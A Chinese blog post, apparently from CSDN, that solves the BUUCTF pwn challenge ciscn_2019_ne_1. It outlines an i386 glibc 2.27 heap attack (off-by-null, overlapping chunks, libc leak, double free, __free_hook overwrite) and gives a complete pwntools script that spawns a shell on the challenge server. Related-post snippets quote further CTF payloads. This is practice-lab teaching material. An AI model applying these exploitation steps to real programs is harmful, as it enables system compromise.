[BUUCTF-pwn] ciscn_2019_ne_1

最新推荐文章于 2023-03-11 19:32:08 发布
最新推荐文章于 2023-03-11 19:32:08 发布
阅读量223 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122384069
版权

2.27-i386 的堆很少见

4小时才完成,前边想得有点乱了。

堆块的结构:

        总管理块0x31:10个块指针

        头块0x21:ptr_comment,ptr_name,XXX,XXX两个没用的东西

        name块:大小自定不能太大,这个块由scanf %ns 读入,多加\0 这个很隐蔽,一时没发现浪费不少时间。

        comment块:0x8c 这个块由read读入后边不带\0,将来用于泄露libc

        还有个改名的菜单,转了好久又整逆向,原来是个蜜罐。

找到两点就好办了:

  1. 由于每个块都有管理块,这个很碍事,先建5个name0x21的块,然后释放,以后建块都用这些。让name块连在一起。
  2. 由于name块大小不足以进入unsort所以要多建7个,用off_by_null模板建1fc,2c,1fc*8
  3. 把3及以后的都删掉,填满tcache
  4. 释放0进入unsort,释放1重建写满修改2的头为0x200,再释放2与前边合并
  5. 重建除2外所有先清空tcache再用掉unsort开头的0x200
  6. 再建0x2c得到重叠块
  7. 对1个块加comment然后释放带出unsort的bk得到libc
  8. 这时0和9是重叠块进行double free形成loop
  9. 建__free_hook,/bin/sh,system再释放3得到shell
from pwn import *

local = 0
if local == 1:  #local
    p = process('./pwn')
elif local == 0:           #remote
    p = remote('node4.buuoj.cn', 26201) 

libc_elf = ELF('/home/shi/pwn/libc6-i386_2.27-3u1/libc-2.27.so')
one = [0x3cbea,0x3cbec,0x3cbf0,0x3cbf7,0x6729f,0x672a0,0x13573e,0x13573f]
libc_start_main_ret = 0x1eee5    
    

elf = ELF('./pwn')
context(arch = 'i386', log_level='debug')

serial = b'7O\x14L\x02\x16C!'

def add(size, name):
    p.sendlineafter(b'>>> ', b'1')
    p.sendlineafter(b"Name length: ", str(size).encode())
    p.sendafter(b"Name: ", name)
    p.sendlineafter(b"Price: ", b'100')

def rename(idx, name):
    p.sendlineafter(b'>>> ', b'4')
    p.sendlineafter(b"Give me an index: ", str(idx).encode())
    p.send(name)

    p.sendlineafter(b"Wanna get more power?(y/n)", b'y')
    p.sendlineafter(b"Give me serial: ", serial)
    p.sendafter(b"Hey Pwner\n", b'AAAA')

def addcomment(idx, comment, sc=0x31):
    p.sendlineafter(b'>>> ', b'2')
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendafter(b": ", comment)
    p.sendlineafter(b"And its score: ", str(sc).encode())

def free(idx):
    p.sendlineafter(b'>>> ', b'3')
    p.sendlineafter(b": ", str(idx).encode())

for i in range(5):
    add(0x10, b'BBBB\n') #0
for i in range(5):
    free(i)
add(0x1fc, b'A\n') #0
add(0x2c, b'B\n') #1
for i in range(8):
    add(0x1fc, b'A\n') #2-9

for i in range(3,10):
    free(i)
free(0)
free(1)
add(0x2c, b'A'*0x28 + p32(0x230)) #0
free(2)
#clear tcache x200 use 1st x200
for i in range(8):
    add(0x1fc, b'A\n') #1-8

add(0x2c, b'B\n') #9=0

addcomment(8, b'cccc')
free(8)
p.recvuntil(b'Comment cccc')

libc_base = u32(p.recv(4)) - 0x50 - libc_elf.sym['__malloc_hook']
libc_elf.address = libc_base
print('libc:', hex(libc_base))

add(0x1fc, b'A\n') #8
addcomment(8, b'ccc')

free(3) #不够用了,释放

free(0)
free(9)

add(0x2c, p32(libc_elf.sym['__free_hook']) +b'\n') #0
add(0x2c, b'/bin/sh\x00\n') #3
add(0x2c, p32(libc_elf.sym['system'])+ b'\n') #4
free(3)

p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn_2019_n_1
weixin_44110537的博客
08-26 514
栈溢出覆盖掉v2为11.28125的存储形式从而打开后门. from pwn import * p=remote('xxxxxxxxxx',xxxxx) payload='I'*(0x30-0x04)+p32(0b01000001001101001000000000000000) p.recvuntil('Let\'s guess the number.') p.sendline(payload) p.interactive() ...
BUUCTF_PWN - ciscn_2019_n_1
weixin_46009088的博客
12-06 317
BUUCTF_PWN - ciscn_2019_n_1 查看程序保护模式和文件基本信息 有个NX保护,如果要写shellcode有点麻烦,文件是64位小端程序(各条保护详情介绍请看胡写瞎写(1) pwntools常见命令) IDA载入 shift+F12寻找敏感字符串,发现一个cat /flag 查看该字符串的交叉引用: 查看该函数: 很明显这是通过栈溢出覆盖v2的值变成11.28125 拿到 flag 我们发现gets()并且v2是在 rsp + 2Ch,那就是说只要输入超过44个字符便可以覆盖.
BUUCTF pwn——ciscn_2019_n_1
CNS-Enterprise BCC-1701-J
03-11 252
BUUCTF 做题练习
BUUCTF Pwn ciscn_2019_n_1 1
qq_45200829的博客
11-08 311
BUUCTF Pwn类型 ciscn_2019_n_1 1 解题过程
BUUCTF PWN ciscn_2019_n_1
m0_54262894的博客
09-10 116
拿到文件先checksec 仅开启了NX保护 放入IDA中 查看main函数很简单,没有什么明显漏洞 发现了func函数,双击试试看 可以看到只要v2等于11.25125就可以执行cat flag命令 先把11.28125转为16进制,放着备用(0x41348000) 我们的思路就是利用gets这个危险函数,通过覆盖v1的地址来修改v2的值,进而执行system命令,拿到flag。 写脚本 frompwn impor...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
BUUCTF - PWNciscn_2019_n_1
古月浪子的博客
03-19 3562
checksec一下 IDA打开,发现如果满足的条件达成,就能get flag 找到栈溢出漏洞,输入可以覆盖到v2 写代码把11.28125在内存中的十六进制表示出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ...
[BUUCTF-pwn]——ciscn_2019_n_1
Y_peak的博客
01-31 891
[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_1 题目: 老规矩下载下来后,在Linux上checksec一下,64位,并且没有开启栈保护,意味着我们可以利用栈溢出 在IDA中看一下,main函数里面没有什么可以利用的 双击func函数看看,就是我们想要的。 思路一 —— 覆盖局部变量
[BUUCTF]PWN------ciscn_2019_n_1
BangSen1的博客
01-16 248
ciscn_2019_n_1 例行检查,64bit,NX保护开启 运行一下,没有信息 64位IDA打开,看到了cat flag ,跟进瞧瞧 函数显示 ,当v2等于11.28125时,得到flag,但要求 我们输入的是v1,所以我们只有把v1和v2 之间全部填满之后紧接着写入11.28125即可。 我们可以看到这两个之间的大小为0x2C 再将11.28125转换为内存中的16进制,结果为 0x41348000 摘自 exp 得到FLAG ...
[BUUCTF]PWN5——ciscn_2019_n_1
mcmuyanga的博客
08-25 1455
[BUUCTF]4——ciscn_2019_n_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_n_1 步骤: 例行检查,64位,开启了nx保护 nc一下看看输入点的字符串,看运行结果猜测是一个猜数的程序,而且需要我们猜的数应该是11.28125 输入11.28125,发现还是不对 用64位ida打开,首先shift+f12查看程序里的字符串,发现了 “ cat /flag ” 双击跟进,ctrl+x找到调用这个字符串的函数 我们可以看到第10行的if
BUUCTF|PWN-ciscn_2019_n_1-WP
l2645470582_的博客
07-28 244
1、下载文件并开启靶机 2、在Linux系统中查看该文件信息 checksec ciscn_2019_n_1 3、文件查出来是64位文件,我们用64位IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串cat/flag,再按F5进入反编译代码区 3.3、cat/flag地址为 v1地址: r返回地址: 4、编译代码 #encoding=utf-8 from pwn imp...
[每日一PWN]BUUCTF ciscn_2019_n_1
qq_55233040的博客
11-21 399
这道题双解,一种ret2text,另一种就是单纯的覆盖数据改变判断结果。
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1253
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
[BUUCTF-pwn]——ciscn_2019_c_1
Y_peak的博客
02-07 1165
[BUUCTF-pwn]——ciscn_2019_c_1 题目地址:https://buuoj.cn/challenges#ciscn_2019_c_1 题目: 下载下来checksec一下 再IDA上面看一下,利用shift + f12看下字符串,发现没有我们想要的字符串。以为是ret2shellcode,结果弄了半天不可以。重新看一遍发现开启了NX保护,原来是ret2libc类型的,呜呜呜。 ...
[BUUCTF]PWN——ciscn_2019_n_3
mcmuyanga的博客
01-06 782
ciscn_2019_n_3 附件 步骤 例行检查,32位,开启了nx和canary保护 本地试运行一下,经典的堆题的菜单 3.32位ida载入 new(),申请了两个chunk,第一个chunk(13行)固定大小0xC,存放的是rec_int_print和rec_int_free函数的地址,第二个chunk(32行),是我们申请的chunk del() 如果值是整数,直接 free chunk 如果值是字符串,则 chunk 和存储字符串的 chunk 都要 free。注意这里只是进行了
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值